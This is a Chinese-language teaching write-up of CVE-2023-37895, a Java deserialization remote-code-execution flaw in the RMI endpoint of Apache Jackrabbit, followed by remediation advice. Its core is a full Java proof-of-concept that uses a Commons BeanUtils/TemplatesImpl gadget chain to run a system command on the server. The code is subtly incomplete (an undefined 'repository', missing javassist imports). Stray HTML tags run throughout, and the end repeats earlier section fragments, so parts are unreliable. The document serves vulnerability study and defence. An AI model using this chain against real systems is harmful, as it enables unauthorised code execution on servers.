Apache Jackrabbit 反序列化漏洞分析(CVE-2023-37895) 教学文档<\/h1>

1. 漏洞背景<\/h2>

Apache Jackrabbit 是一个开源的内容仓库实现，它完整实现了 JCR (Java Content Repository) API 规范。JCR 是为内容仓库定义的 Java API 标准接口，允许应用程序通过这些标准接口访问不同的内容仓库实现。<\/p>

Jackrabbit 提供了丰富的内容管理功能，包括：<\/p>

层次结构节点管理<\/li>
版本控制<\/li>
观察(Observation)<\/li>
查询功能<\/li>
锁定机制<\/li>

事务支持<\/li> <\/ul>

2. 漏洞概述<\/h2>
Jackrabbit 在 `\/rmi<\/code> 路径下提供了 RMI 服务，使远程客户端可以通过 RMI 协议访问服务器端的内容仓库。该漏洞存在于 RMI 服务的反序列化过程中，攻击者可以构造恶意的序列化对象实现远程代码执行(RCE)。<\/p>`

3. 漏洞原理分析<\/h2>
3.1 漏洞入口<\/h3>
通过 web.xml 配置文件可知，\/rmi<\/code> 路径对应的 Servlet 是 org.apache.jackrabbit.servlet.remote.RemoteBindingServlet<\/code>。<\/p>
该 Servlet 的核心处理逻辑：<\/p>

调用 getRemoteRepository()<\/code> 方法获取 Repository 对象<\/li>
将 Repository 对象转化为 Stub 代理对象返回给客户端<\/li>
<\/ol>
3.2 反序列化流程<\/h3>

客户端获取 Repository 对象后，可以调用 login()<\/code> 方法<\/li>
服务端通过 RMI 的 JRMP 协议接收客户端传输的 Credentials 类<\/li>
服务端对接收到的序列化数据进行反序列化<\/li>
<\/ol>
3.3 漏洞利用点<\/h3>

Credentials<\/code> 是一个继承 Serializable<\/code> 的空接口<\/li>
其中一个实现类 SimpleCredentials<\/code> 包含一个 Map<String,Object><\/code> 类型的 attributes<\/code> 属性<\/li>
攻击者可以构造恶意的 PriorityQueue<\/code> 对象并存入 attributes<\/code> Map 中<\/li>
反序列化时会递归反序列化所有属性，包括 attributes<\/code> Map 中的恶意对象<\/li>
<\/ul>
4. 漏洞利用链<\/h2>
利用 Commons BeanUtils 组件构造攻击链：<\/p>

构造恶意的 TemplatesImpl<\/code> 对象<\/li>
使用 BeanComparator<\/code> 和 PriorityQueue<\/code> 构造反序列化链<\/li>
将构造的 PriorityQueue<\/code> 存入 SimpleCredentials<\/code> 的 attributes<\/code> 属性<\/li>
通过 RMI 发送恶意 SimpleCredentials<\/code> 对象<\/li>
<\/ol>
5. 漏洞复现<\/h2>
5.1 环境准备<\/h3>

Apache Jackrabbit 受影响版本<\/li>
包含 Commons BeanUtils 组件的环境<\/li>
<\/ul>
5.2 POC 代码<\/h3>
package<\/span> org.example;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;<\/span>
<\/span><\/span>import<\/span> com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.beanutils.BeanComparator;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Field;<\/span>
<\/span><\/span>import<\/span> java.util.PriorityQueue;<\/span>
<\/span><\/span>import<\/span> org.apache.jackrabbit.rmi.repository.URLRemoteRepository;<\/span>
<\/span><\/span>import<\/span> javax.jcr.Repository;<\/span>
<\/span><\/span>import<\/span> javax.jcr.SimpleCredentials;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> Exp<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        byte<\/span>[]<\/span> code =<\/span> getTemplatesImpl(<\/span>"open -a calculator"<\/span>);<\/span>
<\/span><\/span>        byte<\/span>[][]<\/span> codes =<\/span> {<\/span>code};<\/span>
<\/span><\/span>        
<\/span><\/span>        TemplatesImpl obj =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>        setFieldValue(<\/span>obj,<\/span> "_bytecodes"<\/span>,<\/span> codes);<\/span>
<\/span><\/span>        setFieldValue(<\/span>obj,<\/span> "_name"<\/span>,<\/span> "aaaa"<\/span>);<\/span>
<\/span><\/span>        setFieldValue(<\/span>obj,<\/span> "_tfactory"<\/span>,<\/span> new<\/span> TransformerFactoryImpl());<\/span>
<\/span><\/span>        
<\/span><\/span>        BeanComparator comparator =<\/span> new<\/span> BeanComparator(<\/span>null<\/span>,<\/span> String.<\/span>CASE_INSENSITIVE_ORDER<\/span>);<\/span>
<\/span><\/span>        final<\/span> PriorityQueue<<\/span>Object><\/span> payload =<\/span> new<\/span> PriorityQueue<<\/span>Object>(<\/span>2<\/span>,<\/span> comparator);<\/span>
<\/span><\/span>        payload.<\/span>add<\/span>(<\/span>"1"<\/span>);<\/span>
<\/span><\/span>        payload.<\/span>add<\/span>(<\/span>"1"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        setFieldValue(<\/span>comparator,<\/span> "property"<\/span>,<\/span> "outputProperties"<\/span>);<\/span>
<\/span><\/span>        setFieldValue(<\/span>payload,<\/span> "queue"<\/span>,<\/span> new<\/span> Object[]{<\/span>obj,<\/span> obj});<\/span>
<\/span><\/span>        
<\/span><\/span>        SimpleCredentials exp =<\/span> new<\/span> SimpleCredentials(<\/span>"admin"<\/span>,<\/span> "admin"<\/span>.<\/span>toCharArray<\/span>());<\/span>
<\/span><\/span>        exp.<\/span>setAttribute<\/span>(<\/span>"admin"<\/span>,<\/span> payload);<\/span>
<\/span><\/span>        
<\/span><\/span>        repository.<\/span>login<\/span>(<\/span>exp);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> void<\/span> setFieldValue<\/span>(<\/span>Object target,<\/span> String name,<\/span> Object value)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        Class c =<\/span> target.<\/span>getClass<\/span>();<\/span>
<\/span><\/span>        Field field =<\/span> c.<\/span>getDeclaredField<\/span>(<\/span>name);<\/span>
<\/span><\/span>        field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        field.<\/span>set<\/span>(<\/span>target,<\/span> value);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> byte<\/span>[]<\/span> getTemplatesImpl<\/span>(<\/span>String cmd)<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            ClassPool pool =<\/span> ClassPool.<\/span>getDefault<\/span>();<\/span>
<\/span><\/span>            CtClass ctClass =<\/span> pool.<\/span>makeClass<\/span>(<\/span>"Evil"<\/span>);<\/span>
<\/span><\/span>            CtClass superClass =<\/span> pool.<\/span>get<\/span>(<\/span>"com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet"<\/span>);<\/span>
<\/span><\/span>            ctClass.<\/span>setSuperclass<\/span>(<\/span>superClass);<\/span>
<\/span><\/span>            
<\/span><\/span>            CtConstructor constructor =<\/span> ctClass.<\/span>makeClassInitializer<\/span>();<\/span>
<\/span><\/span>            constructor.<\/span>setBody<\/span>(<\/span>" try {\n"<\/span> +<\/span>
<\/span><\/span>                    " Runtime.getRuntime().exec(\""<\/span> +<\/span> cmd +<\/span> "\");\n"<\/span> +<\/span>
<\/span><\/span>                    " } catch (Exception ignored) {\n"<\/span> +<\/span>
<\/span><\/span>                    " }"<\/span>);<\/span>
<\/span><\/span>            
<\/span><\/span>            byte<\/span>[]<\/span> bytes =<\/span> ctClass.<\/span>toBytecode<\/span>();<\/span>
<\/span><\/span>            ctClass.<\/span>defrost<\/span>();<\/span>
<\/span><\/span>            return<\/span> bytes;<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>            e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>            return<\/span> new<\/span> byte<\/span>[]{};<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>5.3 执行效果<\/h3>
运行 POC 后，会执行指定的系统命令（如打开计算器）。<\/p>
6. 修复建议<\/h2>


网络层面防护<\/strong>：<\/p>

使用网络 ACL 限制访问 Jackrabbit 的来源<\/li>
如非必要，不要将 Jackrabbit 暴露在互联网上<\/li>
<\/ul>
<\/li>

组件升级<\/strong>：<\/p>

升级到已修复的安全版本<\/li>
移除或更新存在漏洞的依赖组件（如 Commons BeanUtils）<\/li>
<\/ul>
<\/li>

代码层面防护<\/strong>：<\/p>

实现自定义的 ObjectInputStream 并重写 resolveClass 方法<\/li>
对反序列化的类进行白名单校验<\/li>
<\/ul>
<\/li>

配置加固<\/strong>：<\/p>

禁用不必要的 RMI 服务<\/li>
配置 JVM 安全策略限制敏感操作<\/li>
<\/ul>
<\/li>
<\/ol>
7. 总结<\/h2>
CVE-2023-37895 漏洞利用了 Apache Jackrabbit 中 RMI 服务对 Credentials 对象的反序列化过程，通过构造恶意的序列化数据实现远程代码执行。该漏洞危害性较高，攻击者可在受影响系统上执行任意代码。建议用户及时采取防护措施，避免系统遭受攻击。<\/p>

Apache Jackrabbit 反序列化漏洞分析(CVE-2023-37895) 教学文档<\/h1>

2. 漏洞概述<\/h2> Jackrabbit 在 \/rmi<\/code> 路径下提供了 RMI 服务，使远程客户端可以通过 RMI 协议访问服务器端的内容仓库。该漏洞存在于 RMI 服务的反序列化过程中，攻击者可以构造恶意的序列化对象实现远程代码执行(RCE)。<\/p>

5. 漏洞复现<\/h2>

5.3 执行效果<\/h3> 运行 POC 后，会执行指定的系统命令（如打开计算器）。<\/p>

5.3 执行效果<\/h3>
运行 POC 后，会执行指定的系统命令（如打开计算器）。<\/p>